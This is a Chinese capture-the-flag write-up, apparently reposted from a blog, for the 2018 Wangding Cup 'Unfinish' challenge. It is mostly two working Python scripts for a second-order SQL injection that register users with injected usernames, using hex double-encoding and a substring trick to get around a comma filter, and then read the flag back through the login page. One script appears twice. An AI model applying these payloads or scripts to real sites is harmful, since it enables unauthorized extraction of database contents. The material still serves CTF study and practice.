[网鼎杯2018]Unfinish
作者:互联网
[网鼎杯2018]Unfinish
0x01.前言
-
过滤了
,分割时使用from 1 for 10绕过
-
0'+hex编码要读取的信息+'0
要进行二次编码一次编码会被截断
解法1
payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0
脚本
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(0,100):
payload="0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(1+i*10)
#print(payload)
data_reg ={"email":"11111231{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"11111231{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text)
#str=str+','+soup.span.text
#print(str)
解法2
payload:0'+ascii(substr((select * from flag) from {} for 1))+'0
脚本
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(1,100):
payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
#print(payload)
data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text)
str=str+','+soup.span.text
print(str)
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(1,100):
payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
#print(payload)
data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text)
str=str+','+soup.span.text
print(str)
标签:text,headers,2018,str,import,Unfinish,网鼎杯,data,reg 来源: https://www.cnblogs.com/da-wn/p/15359314.html